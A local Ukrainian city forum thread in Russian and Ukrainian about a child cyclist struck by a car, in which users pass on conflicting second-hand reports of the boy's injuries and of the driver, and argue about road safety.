Перейти до змісту
  • Загальні розмови
  • ВНИМАНИЕ! авария, сбит ребенок!


    Рекомендовані повідомлення

    минут 30 назад на перекрестке Независимости и Гагарина была сбита девочка (или мальчик, но скорее девочка) лет 10-15 на велосипеде. Если кто знает родственников или знакомых, срочно сообщите, ее забрала скорая броварская. состояние критическое.

    на ней біла красная футболка, черные шерты. спортивный велосипед салатовых оттенков

    Прошу вывесить это на главную портала

    http://www.neo-lit.ru/vis/banners/nax.gif


    Посилання на коментар
    Поділитись на інші сайти

    то все таки мальчик,вроде 14 лет,он дыша,и очень кричал когда его врачи поднимали....это ужасная авария....
    В дорозі життя є найкращі хвилиги.Є щастя і ти з ним поруч іди=)
    Посилання на коментар
    Поділитись на інші сайти

    Уже щось відомо? Як він?
    Єдиний спосіб позбутися спокуси - піддатися їй. (О. Уайльд)
    Посилання на коментар
    Поділитись на інші сайти

    Кошмар....интересно узнать в каком сейчас состоянии мальчик....может кто-то знает хоть какую-нибудь информацию?
    Fuck!
    Посилання на коментар
    Поділитись на інші сайти

    Сам велосипедист,і коли проце узнав стало не пособі...як він там?Може хто знає...?

    Куріння - яд,

    Бухло - отрава.

    DRUM`n`BASS

    Посилання на коментар
    Поділитись на інші сайти

    Ето мальчик был я слышпл как возле места аварии говорили люди между собой ему 12-13 лет от ето всё что я знаю!А да я сам не видел аварии но я подошол после того как его забрала скорая!
    Посилання на коментар
    Поділитись на інші сайти

    он лежит в реанимации,но сказали жить будет,никаких внутрених органов незадето,и вроде у него черепномозговая травма...
    В дорозі життя є найкращі хвилиги.Є щастя і ти з ним поруч іди=)
    Посилання на коментар
    Поділитись на інші сайти

    У него розрыв легких,поврежден хребет сильно,и что-то с почками.
    <script language="JavaScript" type="text/javascript" src="http://qipstatus.ru/you"></script>
    Посилання на коментар
    Поділитись на інші сайти

    Ого не повезло пацану!
    Посилання на коментар
    Поділитись на інші сайти

    Хм... Каждый говорит что-то своё ).

    vk

    fb

     

    190px-BlackFlagSymbol.svg.png

    Посилання на коментар
    Поділитись на інші сайти

    он лежит в реанимации,но сказали жить будет,никаких внутрених органов незадето,и вроде у него черепномозговая травма...

     

    У него розрыв легких,поврежден хребет сильно,и что-то с почками.

     

    Омг... :blink: И кому верить?
    Fuck!
    Посилання на коментар
    Поділитись на інші сайти

    Омг... :blink: И кому верить?

     

    Ну ето мне говорили типы которые работают на ЕКТЕ,они туда приехали и врачи им сказали.
    <script language="JavaScript" type="text/javascript" src="http://qipstatus.ru/you"></script>
    Посилання на коментар
    Поділитись на інші сайти

    Всем но почючють!
    Посилання на коментар
    Поділитись на інші сайти

    Ну ето мне говорили типы которые работают на ЕКТЕ,они туда приехали и врачи им сказали.

     

    Значит дела у мальчишки не очень...жалко парня...12-14 лет а уже повреждён хребет.... :blink: Кошмар...
    Fuck!
    Посилання на коментар
    Поділитись на інші сайти

    кто сбил?

     

    Я толком не видел но кажетса какойто мужык на бмв!
    Посилання на коментар
    Поділитись на інші сайти

    Я толком не видел но кажетса какойто мужык на бмв!

     

     

     

    ты уж определись - ты или видел, или нет :wink:

    We are the products of the created circumstances


    Посилання на коментар
    Поділитись на інші сайти

    Мужык на БМВ 5 походу серого цвета.
    <script language="JavaScript" type="text/javascript" src="http://qipstatus.ru/you"></script>
    Посилання на коментар
    Поділитись на інші сайти

    Хм... Каждый говорит что-то своё ).

     

    та да!!!скажіть точно що з малим...а то якось несумісні ті 2 відповіді!!!!
    Посилання на коментар
    Поділитись на інші сайти

    Мужык на БМВ 5 походу серого цвета.

     

    Так почему он не отвез мальчика в больницу?

    http://www.weblancer.net/users/shrikes/

    - мое портфолио

    Посилання на коментар
    Поділитись на інші сайти

    Так почему он не отвез мальчика в больницу?

     

    А потому что уроды обкуренные гасают, и им все пофиг. Печальная правда к сожалению. Как это не таксист еще был...
    Посилання на коментар
    Поділитись на інші сайти

    А потому что уроды обкуренные гасают, и им все пофиг. Печальная правда к сожалению. Как это не таксист еще был...

     

    Під планом якраз так не роблять. Пяний, очевидно. А взагалі - там повністю кончена ділянка дороги - мене вже хз скільки разів там ледь не збили + навіть о 21:20, коли на тому місці стояла вже купа народу, і на вулиці було вже досить темно (сутінки, а особливо час_після_сутінок_перед_темрявою - найнебезпечніший для учасників дорожнього руху) жоден вуличний ліхтар в центрі (!) міста не горів. І це вже який день поспіль... Змінено користувачем Drok (Bezcenzury)
    Посилання на коментар
    Поділитись на інші сайти

    не видел,так что не буду судить, но в последнее время эти велосипедисты реально задолбали, нельзя на машине спокойно проехать, постоянно по середине дороге ганяют как угашеные..

    по улице воссоединения вообще кошмар, там скорее дорога для великов и роликов создана, ганяют поперек без страха, сигналить безполезно, бараны малолетние..

    Посилання на коментар
    Поділитись на інші сайти

    Так почему он не отвез мальчика в больницу?

     

    с переломаным хребтом?! лихо!

    Посилання на коментар
    Поділитись на інші сайти

    А потому что уроды обкуренные гасают, и им все пофиг. Печальная правда к сожалению. Как это не таксист еще был...

     

    Ніхто п_яним не був. Водій їхав за всіми правила,а малий - на червоне світло і з шаленою швидкістю виїхав з-за повороту. До речі,в машині ще була дитина.
    Посилання на коментар
    Поділитись на інші сайти

    Гість
    Ця тема закрита для опублікування відповідей.
    ×
    ×
    • Створити...

    Важлива інформація

    Використовуючи цей сайт, Ви погоджуєтеся з нашими Умови використання, Політика конфіденційності, Правила, Ми розмістили cookie-файлы на ваш пристрій, щоб допомогти зробити цей сайт кращим. Ви можете змінити налаштування cookie-файлів, або продовжити без зміни налаштувань..